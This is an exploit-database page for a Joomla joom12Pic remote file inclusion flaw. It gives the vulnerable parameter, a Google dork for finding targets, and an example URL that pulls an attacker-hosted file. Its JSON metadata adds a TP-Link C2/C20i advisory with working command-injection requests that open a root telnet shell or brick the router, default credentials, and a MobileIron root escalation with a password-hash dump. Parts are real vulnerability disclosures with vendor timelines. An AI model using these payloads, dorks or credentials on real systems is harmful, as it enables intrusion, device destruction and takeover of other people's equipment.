Search...

Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability

2007-09-16T00:00:00

ID 1337DAY-ID-2144
Type zdt
Reporter Morgan
Modified 2007-09-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability
==================================================================



######################################
# Joom!12Pic Component RFI           #
######################################

Bug in :
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joom12pic"

Example:

http://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)




#  0day.today [2018-03-14]  #

JSON Vulners Source

Initial Source

{"hash": "b0b1bbfd146335bf19ac987bb56cc67683e91a79e6b52df0df214dee800d627e", "id": "1337DAY-ID-2144", "lastseen": "2018-03-14T14:34:24", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "bcdaf4f2ea68094b7889ca66eb6e2982", "key": "href"}, {"hash": "cb5de2a8bdfa281d8ce124576e08e0d2", "key": "modified"}, {"hash": "cb5de2a8bdfa281d8ce124576e08e0d2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f73dde2d8c7879ae8d1fcdc03c4ffebc", "key": "reporter"}, {"hash": "5e62667d81b13bcc0796ccd0e9c68d97", "key": "sourceData"}, {"hash": "b94958d717c27cc3e0bfaa1b5baf0c2a", "key": "sourceHref"}, {"hash": "999aff5c4686fb3f4ba0ee2426428de1", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}, "vulnersScore": 6.8}, "type": "zdt", "sourceHref": "https://0day.today/exploit/2144", "description": "Exploit for unknown platform in category web applications", "title": "Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability", "history": [{"bulletin": {"hash": "47c323f3761210998397b27093bff337180ad55ed35ac42eddb496ace96311a8", "id": "1337DAY-ID-2144", "lastseen": "2016-04-20T01:11:05", "enchantments": {"score": {"value": 5.5, "modified": "2016-04-20T01:11:05"}}, "hashmap": [{"hash": "999aff5c4686fb3f4ba0ee2426428de1", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "f73dde2d8c7879ae8d1fcdc03c4ffebc", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "cb5de2a8bdfa281d8ce124576e08e0d2", "key": "modified"}, {"hash": "cb5de2a8bdfa281d8ce124576e08e0d2", "key": "published"}, {"hash": "241ff89f29759761ef70bd9dcdad4a7b", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "31ef3d70fb0a40ecba4e200d29cbe4ff", "key": "href"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "d64814e90dcfd8f34395236c7c74856c", "key": "sourceData"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/2144", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "Joomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================================\r\nJoomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability\r\n==================================================================\r\n\r\n\r\n\r\n######################################\r\n# Joom!12Pic Component RFI #\r\n######################################\r\n\r\nBug in :\r\n/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=\r\nVariable : $mosConfig_live_site\r\n\r\nDork: \"com_joom12pic\"\r\n\r\nExample:\r\n\r\nhttp://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=[attacker]\r\n\r\n\r\nGreets to all Irc.RealWorm.Net #Morgan Users ;)\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2007-09-16T00:00:00", "references": [], "reporter": "Morgan", "modified": "2007-09-16T00:00:00", "href": "http://0day.today/exploit/description/2144"}, "lastseen": "2016-04-20T01:11:05", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================================\r\nJoomla Component joom12Pic 1.0 Remote File Inclusion Vulnerability\r\n==================================================================\r\n\r\n\r\n\r\n######################################\r\n# Joom!12Pic Component RFI #\r\n######################################\r\n\r\nBug in :\r\n/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=\r\nVariable : $mosConfig_live_site\r\n\r\nDork: \"com_joom12pic\"\r\n\r\nExample:\r\n\r\nhttp://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=[attacker]\r\n\r\n\r\nGreets to all Irc.RealWorm.Net #Morgan Users ;)\r\n\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "published": "2007-09-16T00:00:00", "references": [], "reporter": "Morgan", "modified": "2007-09-16T00:00:00", "href": "https://0day.today/exploit/description/2144"}

{"zdt": [{"lastseen": "2018-04-03T13:29:45", "references": [], "description": "TP-Link CS and C20i are vulnerable to command injection, denial of service, and improper firewall rule issues.", "edition": 1, "reporter": "Pierre Kim", "published": "2017-02-10T00:00:00", "type": "zdt", "title": "TP-Link C2 / C20i Command Injection / Denial Of Service", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-02-10T00:00:00", "href": "https://0day.today/exploit/description/26951", "id": "1337DAY-ID-26951", "sourceData": "Title: TP-Link C2 and C20i vulnerable to command injection\r\n(authenticated root RCE), DoS, improper firewall rules\r\nAdvisory URL: https://pierrekim.github.io/advisories/2017-tplink-0x00.txt\r\nBlog URL: https://pierrekim.github.io/blog/2017-02-09-tplink-c2-and-c20i-vulnerable.html\r\nDate published: 2017-02-09\r\nVendors contacted: TP-Link\r\nRelease mode: Released\r\nCVE: no current CVE\r\n\r\n\r\n\r\n## Product Description\r\n\r\nTP-Link is a Chinese manufacturer of computer networking products such\r\nas routers and IOT devices.\r\n\r\n\r\n\r\n## Vulnerabilities Summary\r\n\r\nCommand Injections exist in the HTTP management interface up to the\r\nlatest firmware version (0.9.1 4.2 v0032.0 Build 160706 Rel.37961n) of\r\nTP-Link C2 and C20i, allowing an authenticated attacker to get a\r\nremote shell with root privileges.\r\nAn attacker can DoS the httpd server and the firewall rules are too\r\npermissive by default on the WAN interface.\r\n\r\n\r\n\r\n## Details - RCE with a single HTTP request\r\n\r\nUsing the so-called \"Diagnostic\" page, the attacker can run any\r\ncommand including telnetd, using the remote host field of the ping\r\nutility:\r\n\r\n$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25)\r\n\r\nWhile being authenticated (see the credentials in base64 format),\r\nsending this HTTP request directly will start a telnetd on the router\r\non port 25/tcp without authentication:\r\n\r\nPOST /cgi?2 HTTP/1.1\r\nHost: 192.168.1.1\r\nContent-Type: text/plain\r\nReferer: http://192.168.1.1/mainFrame.htm\r\nContent-Length: 208\r\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\n\r\n\r\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\ndataBlockSize=64\r\ntimeout=1\r\nnumberOfRepetitions=1\r\nhost=$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25)\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\n\r\n\r\n\r\nAn attacker can also use backsticks to execute commands:\r\n`echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25`\r\n\r\n\r\nResulting access:\r\n\r\n[email\u00a0protected]:~/tplink-0day-c2-and-c20i$ telnet 192.168.1.1 25\r\nTrying 192.168.1.1...\r\nConnected to 192.168.1.1.\r\nEscape character is '^]'.\r\n~ # ls\r\nweb usr sbin mnt lib dev\r\nvar sys proc linuxrc etc bin\r\n~ # cat /proc/version\r\nLinux version 2.6.36 ([email\u00a0protected]) (gcc version 4.6.3\r\n(Buildroot 2012.11.1) ) #1 Wed Jul 6 10:01:06 HKT 2016\r\n~ # ls -la\r\ndrwxr-xr-x 9 176 web\r\ndrwxr-xr-x 13 0 var\r\ndrwxr-xr-x 4 38 usr\r\ndrwxr-xr-x 11 0 sys\r\ndrwxr-xr-x 2 193 sbin\r\ndr-xr-xr-x 83 0 proc\r\ndrwxr-xr-x 2 3 mnt\r\nlrwxrwxrwx 1 11 linuxrc -> bin/busybox\r\ndrwxr-xr-x 3 786 lib\r\ndrwxr-xr-x 5 776 etc\r\ndrwxr-xr-x 5 1274 dev\r\ndrwxr-xr-x 2 280 bin\r\ndrwxr-xr-x 13 177 ..\r\ndrwxr-xr-x 13 177 .\r\n~ # cd etc\r\n/etc # ls\r\nvsftpd_passwd init.d SingleSKU_5G_RU.dat\r\nvsftpd.conf group SingleSKU_5G_NZ.dat\r\nushare.conf fstab SingleSKU_5G_MY.dat\r\nservices default_config.xml SingleSKU_5G_KR.dat\r\nsamba TZ SingleSKU_5G_FCC.dat\r\nresolv.conf SingleSKU_RU.dat SingleSKU_5G_CE.dat\r\nreduced_data_model.xml SingleSKU_NZ.dat SingleSKU_5G_CA.dat\r\nppp SingleSKU_MY.dat RT2860AP5G.dat\r\npasswd.bak SingleSKU_KR.dat RT2860AP.dat\r\npasswd SingleSKU_FCC.dat MT7620_AP_2T2R-4L_V15.BIN\r\niptables-stop SingleSKU_CE.dat MT7610E-V10-FEM-1ANT.bin\r\ninittab SingleSKU_5G_VN.dat\r\n/etc # cd ..\r\n~ # ls -la\r\ndrwxr-xr-x 9 176 web\r\ndrwxr-xr-x 13 0 var\r\ndrwxr-xr-x 4 38 usr\r\ndrwxr-xr-x 11 0 sys\r\ndrwxr-xr-x 2 193 sbin\r\ndr-xr-xr-x 83 0 proc\r\ndrwxr-xr-x 2 3 mnt\r\nlrwxrwxrwx 1 11 linuxrc -> bin/busybox\r\ndrwxr-xr-x 3 786 lib\r\ndrwxr-xr-x 5 776 etc\r\ndrwxr-xr-x 5 1274 dev\r\ndrwxr-xr-x 2 280 bin\r\ndrwxr-xr-x 13 177 ..\r\ndrwxr-xr-x 13 177 .\r\n~ # ps\r\n PID USER VSZ STAT COMMAND\r\n 1 admin 1060 S init\r\n 2 admin 0 SW [kthreadd]\r\n 3 admin 0 SW [ksoftirqd/0]\r\n 4 admin 0 SW [kworker/0:0]\r\n 5 admin 0 SW [kworker/u:0]\r\n 6 admin 0 SW< [khelper]\r\n 7 admin 0 SW [kworker/u:1]\r\n 44 admin 0 SW [sync_supers]\r\n 46 admin 0 SW [bdi-default]\r\n 48 admin 0 SW< [kblockd]\r\n 80 admin 0 SW [kswapd0]\r\n 82 admin 0 SW< [crypto]\r\n 130 admin 0 SW [mtdblock0]\r\n 135 admin 0 SW [mtdblock1]\r\n 140 admin 0 SW [mtdblock2]\r\n 145 admin 0 SW [mtdblock3]\r\n 150 admin 0 SW [mtdblock4]\r\n 155 admin 0 SW [mtdblock5]\r\n 160 admin 0 SW [mtdblock6]\r\n 172 admin 0 SW [kworker/0:1]\r\n 214 admin 0 SW [khubd]\r\n 245 admin 1060 S telnetd\r\n 251 admin 2932 S cos\r\n 252 admin 1060 S init\r\n 255 admin 2120 S igmpd\r\n 258 admin 2144 S mldProxy\r\n 345 admin 2932 S cos\r\n 346 admin 2932 S cos\r\n 347 admin 2932 S cos\r\n 366 admin 2088 S ntpc\r\n 371 admin 2096 S dyndns /var/tmp/dconf/dyndns.conf\r\n 374 admin 2096 S noipdns /var/tmp/dconf/noipdns.conf\r\n 377 admin 2096 S cmxdns /var/tmp/dconf/cmxdns.conf\r\n 433 admin 0 SW [RtmpCmdQTask]\r\n 434 admin 0 SW [RtmpWscTask]\r\n 445 admin 1244 S wlNetlinkTool\r\n 449 admin 1080 S wscd -i ra0 -m 1 -w /var/tmp/wsc_upnp/\r\n 465 admin 1244 S wlNetlinkTool\r\n 466 admin 1244 S wlNetlinkTool\r\n 489 admin 0 SW [RtmpCmdQTask]\r\n 490 admin 0 SW [RtmpWscTask]\r\n 503 admin 1064 S wscd_5G -i rai0 -m 1 -w /var/tmp/wsc_upnp_5G/\r\n 506 admin 2668 S httpd\r\n 518 admin 1748 S upnpd -L br0 -W eth0.2 -en 0 -P eth0.2 -nat 0 -port\r\n 521 admin 2084 S dnsProxy\r\n 526 admin 1068 S dhcpd /var/tmp/dconf/udhcpd.conf\r\n 551 admin 1748 S upnpd -L br0 -W eth0.2 -en 0 -P eth0.2 -nat 0 -port\r\n 552 admin 1748 S upnpd -L br0 -W eth0.2 -en 0 -P eth0.2 -nat 0 -port\r\n 553 admin 1748 S upnpd -L br0 -W eth0.2 -en 0 -P eth0.2 -nat 0 -port\r\n 554 admin 1748 S upnpd -L br0 -W eth0.2 -en 0 -P eth0.2 -nat 0 -port\r\n 555 admin 1748 S upnpd -L br0 -W eth0.2 -en 0 -P eth0.2 -nat 0 -port\r\n 556 admin 1748 S upnpd -L br0 -W eth0.2 -en 0 -P eth0.2 -nat 0 -port\r\n 557 admin 1748 S upnpd -L br0 -W eth0.2 -en 0 -P eth0.2 -nat 0 -port\r\n 558 admin 2668 S tmpd\r\n 561 admin 2556 S tdpd\r\n 569 admin 988 S dhcpc\r\n 578 admin 1036 S zebra -d -f /var/tmp/dconf/zebra.conf\r\n 594 admin 2088 S diagTool\r\n 625 admin 1136 S dropbear -p 22 -r /var/tmp/dropbear/dropbear_rsa_hos\r\n 642 admin 2468 S ushare\r\n 658 admin 2468 S ushare\r\n 660 admin 2468 S ushare\r\n 661 admin 2468 S ushare\r\n 662 admin 2468 S ushare\r\n 663 admin 2468 S ushare\r\n 664 admin 2468 S ushare\r\n 666 admin 2468 S ushare\r\n 851 admin 1060 S /usr/sbin/telnetd -l /bin/sh -p 25\r\n 853 admin 1072 S /bin/sh\r\n 876 admin 1068 S /bin/sh\r\n 878 admin 2576 S cli\r\n 887 admin 1060 R ps\r\n~ #\r\n\r\n\r\n\r\nWith this RCE, an attacker will be able to dump and modify the\r\nconfiguration by editing /dev/mtd3.\r\nThe configuration is written in XML format and is located in the\r\nbeginning (starting at offset 0x10) of this MTD (64K).\r\n\r\n\r\nIf the attacker sends this string, the router will be unable to boot\r\nand will be bricked, by writing random characters on top of the u-boot\r\npartition:\r\n\r\nPOST /cgi?2 HTTP/1.1\r\nHost: 192.168.1.1\r\nContent-Type: text/plain\r\nReferer: http://192.168.1.1/mainFrame.htm\r\nContent-Length: 208\r\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\n\r\n\r\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\ndataBlockSize=64\r\ntimeout=1\r\nnumberOfRepetitions=1\r\nhost=$(echo 127.0.0.1; cat /dev/random > /dev/mtd0)\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\n\r\n\r\n\r\n## Details - DoSing the HTTP server\r\n\r\nWhile being authenticated (see the credentials in base64 format),\r\nsending this HTTP request directly will crash the remote HTTP server:\r\n\r\nGET /cgi/ansi HTTP/1.1\r\nHost: 192.168.1.1\r\nContent-Type: text/plain\r\nReferer: http://192.168.1.1/mainFrame.htm\r\nContent-Length: 208\r\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\r\nConnection: close\r\n\r\n\r\nA resulting core file will be written in the router inside the /var\r\npartition of the attacked router:\r\n\r\n/var # ls -la /var/\r\ndrwxrwxrwx 2 0 lock\r\ndrwxrwxrwx 2 0 log\r\ndrwxrwxrwx 2 0 run\r\ndrwxrwxrwx 7 0 tmp\r\ndrwxr-xr-x 3 0 Wireless\r\ndrwxrwxrwx 2 0 usbdisk\r\ndrwxrwxrwx 2 0 dev\r\ndrwxr-xr-x 5 0 samba\r\n- -rw-r--r-- 1 132 passwd\r\ndrwxrwxrwx 2 0 3G\r\ndrwxrwxrwx 2 0 l2tp\r\ndrwxrwxrwx 7 0 vsftp\r\n- -rw------- 1 348160 core-httpd-506-11-1482798208\r\ndrwxr-xr-x 13 177 ..\r\ndrwxr-xr-x 13 0 .\r\n/var #\r\n\r\n\r\n\r\n## Details - Permissive Iptables rules\r\n\r\nThe default iptables rules are generated within /lib/libcmm.so by\r\nwriting commands inside /var/tmp/dconf/rc.router and using system() on\r\nthis file.\r\n\r\n/var/tmp/dconf/rc.router:\r\n\r\n#!/bin/sh\r\n[...]\r\niptables -t nat -A POSTROUTING -j NATLOOPBACK_UPNP_SECCONN\r\niptables -t nat -A POSTROUTING -j POSTROUTING_NATLOOPBACK_DMZ\r\niptables -t nat -A PREROUTING -j PREROUTING_DMZ\r\niptables -t filter -A FORWARD -i br+ -j ACCEPT\r\niptables -t filter -A FORWARD -d 224.0.0.0/4 -j ACCEPT\r\n[...]\r\n\r\n\r\nBy default, the SNMP port is open on every interface:\r\n\r\n iptables -A INPUT -p udp --dport 161 -j ACCEPT\r\n\r\nThis can be verified with iptables on the router:\r\n\r\n/proc # iptables -nL\r\nChain INPUT (policy DROP)\r\n[...]\r\nACCEPT udp -- 0.0.0.0/0 0.0.0.0/0 udp dpt:161\r\n[...]\r\n\r\nYou can check too by reading the file /var/tmp/dconf/rc.router.\r\n\r\nLuckily, even if SNMP configuration can be modified using the hidden\r\n/main/snmp.html webpage,\r\nit appears the snmpd has been removed from the firmware image.\r\n\r\n\r\n## Details - Misc\r\n\r\nThe binaries (/usr/bin/cos, /usr/bin/tmpd, /lib/libcmm.so) are overall\r\nbadly designed programs, executing tons of system() and running as\r\nroot.\r\n\r\n/usr/bin/cos is a daemon running as root and is launched at the end of\r\n/etc/init.d/rcS (`cos &`): it starts all the daemons using system\r\n(httpd ntpc dnsProxy dhcpd dhcpc snmpd upnpd diagTool voip_server\r\nvoip_client pjsua cwmp wlNetlinkTool pppd dyndns igmpd zebra ushare\r\nsmbd vsftpd telnetd, noipdns hostapd ipsecVpn radvd mldProxy racoon\r\nwscd...)\r\n/usr/bin/tmpd is a daemon running as root and listens to 127.0.0.1:20002.\r\n/lib/libcmm.so is a library with all the main system functions (system\r\nreinitialisation\r\n[admin:$1$$iC.dUsGpxNNJGeOm1dFio/:0:0:root:/:/bin/sh], wifi\r\nconfiguration, debugging with TFTP[hi dutserver!], VPN configuration,\r\n`ifconfig interfaces`, `insmod /lib/modules/pptp.ko`, ...)\r\n\r\n\r\nVsftpd contains default weak passwords:\r\n\r\n[email\u00a0protected]:~$ cat ./etc/vsftpd_passwd\r\nadmin:1234:1:1;guest:guest:0:0;test:test:1:1;$\r\n[email\u00a0protected]:~$\r\n\r\nAccess:\r\n\r\nadmin:1234\r\nguest:guest\r\ntest:test\r\n\r\n\r\n\r\n## Vendor Response\r\n\r\nT-P-Link plans to release a new firmware in February 2017, patching\r\nall listed vulnerabilities. T-P-Link wants to draw attention that in\r\norder to exploit two over three security vulnerabilities, an attacker\r\nwould need to have valid credentials.\r\n\r\n\r\n\r\n## Report Timeline\r\n\r\n* Sep 17, 2016: Vulnerabilities found by Pierre Kim.\r\n* Dec 26, 2016: TP-Link support is contacted by livechat. TP-Link\r\nreplies there is no process to handle security problems in TP-Link\r\nrouters and refuses to indicate a security point of contact.\r\n* Dec 27, 2016: TP-Link support is notified of the vulnerabilities\r\n(using support () tp-link.com, security () tp-link.com, lishaozhang ()\r\ntp-link.net [from /lib/modules/ipt_STAT.ko], huangwenzhong ()\r\ntp-link.net [from /lib/modules/tp_domain.ko]).\r\n* Dec 29, 2016: Pierre sends a full advisory to TP-Link security team.\r\n* Dec 30, 2016: TP-Link confirms the reception of the advisory.\r\n* Jan 03, 2017: Pierre asks TP-Link to confirm the vulnerabilities.\r\n* Jan 09, 2017: TP-Link confirms the security vulnerabilities in\r\nTP-Link C2 and C20i routers and security patches are in progress.\r\n* Jan 21, 2017: Ping from TP-Link about the \"Vendor Response\" section.\r\n* Jan 23, 2017: Pierre answers, asking details in the \"Vendor Response\" section.\r\n* Jan 24, 2017: TP-Link Korea contacts Pierre Kim about the vulnerabilities.\r\n* Jan 27, 2017: Pierre sends a final draft to TP-Link.\r\n* Feb 09, 2017: A public advisory is sent to security mailing lists.\r\n\r\n\r\n\r\n## Credit\r\n\r\nThe vulnerabilities were found by Pierre Kim (@PierreKimSec).\r\n\r\n\r\n\r\n## References\r\n\r\nhttps://pierrekim.github.io/advisories/2017-tplink-0x00.txt\r\nhttps://pierrekim.github.io/blog/2017-02-09-tplink-c2-and-c20i-vulnerable.html\n\n# 0day.today [2018-04-03] #", "sourceHref": "https://0day.today/exploit/26951", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-04-12T09:46:51", "references": [], "edition": 2, "description": "Exploit for hardware platform in category remote exploits", "reporter": "prdelka", "published": "2013-06-10T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "type": "zdt", "title": "MobileIron Virtual Smartphone Platform Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": [], "modified": "2013-06-10T00:00:00", "id": "1337DAY-ID-20873", "href": "https://0day.today/exploit/description/20873", "sourceData": "MobileIron Virtual Smartphone Platform Privilege Escalation Exploit 0day\r\n========================================================================\r\nThe MobileIron Virtual Smartphone Platform is the first solution to combine data-driven\r\nsmartphone and tablet management with real-time wireless cost control. The MDM solution \r\nprovides an appliance which can be configured through a restrictive web and management \r\nshell. A command injection vulnerability within the telnet/SSH shell allows for elevation\r\nof privileges to \"root\" from the low privileged user as well as escaping the restrictive shell.\r\n\r\n* Description\r\nThe MobileIron VSP appliance provides a restricted \"clish\" java application that can be used \r\nfor performing a minimal amount of configuration and requires an \"enable\" password for elevated\r\nprivileges. Probing under the hood of this shell indicates that certain commands are run in \r\nthe native linux OS with sudo, by using the \"show processes\" command you can see the commands being used.\r\n\r\nmiadmin 13353 0.0 0.0 63856 1388 pts/1 S+ 14:45 0:00 /bin/bash /mi/bin/cli-view-log --log mi.log\r\nroot 13399 0.0 0.0 104096 2144 pts/1 S+ 14:45 0:00 /usr/bin/sudo /usr/bin/less mylnk\r\nroot 13400 0.0 0.0 63600 1024 pts/1 S+ 14:45 0:00 /usr/bin/less mylnk\r\n\r\nThe above command can be triggered from the miadmin user with the \"show log\" functoinality, \r\nas \"/usr/bin/less\" is then called with root privileges it is possible to quickly elevate \r\nprivileges to root using !sh as seen in the example here:\r\n\r\n[email\u00a0protected]:~/MobileIron# ssh -l miadmin 10.x.x.x\r\n[email\u00a0protected]'s password: \r\nLast login: Tue Sep 18 14:33:19 2012 from 10.x.x.x\r\n************************************************************\r\n* MobileIron VSP CLI *\r\n* *\r\n* *\r\n************************************************************\r\nWelcome miadmin it is Tue Sep 18 14:38:46 UTC 2012\r\n[email\u00a0protected]> show log mi.log\r\n--log 'mi.log' --\r\n************************************************************\r\n* MobileIron VSP CLI *\r\n* *\r\n* *\r\n************************************************************\r\nWelcome root it is Tue Sep 18 14:38:58 UTC 2012\r\n[email\u00a0protected]> \r\n\r\nAs less supports the ability of executing arbitrary commands and piping input it is trivial to \r\ngain arbitrary command execution by using pipe with the current file \"|m.\" which will change the \r\nless prompt to \"!\" indicating which program to pipe to and then typing /bin/sh -c \"CMD YOU WANT\"\r\nto be able to execute arbitrary commands with root privileges. You will recieve the command\r\noutput.\r\n\r\n--log 'mi.log' --\r\nLinux hostname.victim 2.6.18-308.1.1.el5 #1 SMP Wed Mar 7 04:16:51 EST 2012 x86_64 x86_64 x86_64 GNU/Linux\r\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)\r\n[email\u00a0protected]> \r\n\r\nBy reviewing the host we can determine that mobileiron also provide a default root username with \r\nthe password of \"admin\" in a disabled state (damn...) and a hidden user of \"misupport\".\r\n\r\nroot:!!$1$3FrxHucD$JL4zVWemZeZJY9LY3PruJ1:15544:0:99999:7:::\r\nbin:*:15544:0:99999:7:::\r\ndaemon:*:15544:0:99999:7:::\r\nadm:*:15544:0:99999:7:::\r\nlp:*:15544:0:99999:7:::\r\nsync:*:15544:0:99999:7:::\r\nshutdown:*:15544:0:99999:7:::\r\nhalt:*:15544:0:99999:7:::\r\nmail:*:15544:0:99999:7:::\r\nnews:*:15544:0:99999:7:::\r\nuucp:*:15544:0:99999:7:::\r\noperator:*:15544:0:99999:7:::\r\ngames:*:15544:0:99999:7:::\r\ngopher:*:15544:0:99999:7:::\r\nftp:*:15544:0:99999:7:::\r\nnobody:*:15544:0:99999:7:::\r\ndistcache:!!:15544:0:99999:7:::\r\nvcsa:!!:15544:0:99999:7:::\r\npcap:!!:15544:0:99999:7:::\r\nntp:!!:15544:0:99999:7:::\r\ndbus:!!:15544:0:99999:7:::\r\nmailnull:!!:15544:0:99999:7:::\r\nsmmsp:!!:15544:0:99999:7:::\r\napache:!!:15544:0:99999:7:::\r\nsshd:!!:15544:0:99999:7:::\r\nhaldaemon:!!:15544:0:99999:7:::\r\nmysql:!!:15544::::::\r\npostgres:!!:15544::::::\r\ntomcat:!!:15544::::::\r\nclamav:!!:15544:0:99999:7:::\r\nmisupport:!!:15544:0:99999:7:::\r\nmiadmin:CENSORED:15544:0:99999:7:::\r\n\r\nRemedial Action\r\nDisable the use of telnet and SSH on VSP appliances and ensure that strong passwords are set for \r\nthe miadmin account or be assured that all shell users of VSP appliance can obtain full root\r\nprivileges until a fix is made available. This issue was reported to MobileIron on September 19th \r\n2012 and given a Moderate risk rating. An expected firmware update has been advised that it will\r\nbe available within 3 months of the reporting date.\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/20873"}]}